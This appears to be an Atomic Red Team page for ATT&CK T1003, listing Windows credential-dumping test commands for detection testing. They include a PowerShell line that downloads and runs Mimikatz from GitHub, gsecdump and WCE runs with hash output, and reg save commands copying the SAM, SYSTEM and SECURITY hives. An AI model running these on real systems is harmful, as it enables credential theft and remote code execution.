security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
eeec0bd062fe3bcd35fbba91681a31dc52fe1599
atomic-red-team/Windows/Credential_Access/Credential_Dumping.md
T
Michael Haag e10be818ef Update Credential_Dumping.md
2018-03-21 14:13:10 -04:00

1.3 KiB
Raw Blame History

Credential Dumping

MITRE ATT&CK Technique: T1003

Powershell Mimikatz

Input:

powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

Gsecdump

Gsecdump

Input:

gsecdump -a

Windows Credential Editor

Windows Credential Editor

Input:

wce -o output.txt

Output:

C:\>wce -o output.txt
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.

C:\>type output.txt
test:AMPLIALABS:01020304050607080900010203040506:98971234567865019812734576890102
C:\>

Registry

Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys:

Input:

reg save HKLM\sam sam 
reg save HKLM\system system
reg save HKLM\security security

Output:

C:\>reg save HKLM\sam sam
The operation completed successfully.

These can be processed locally using creddump7

Reference in New Issue View Git Blame Copy Permalink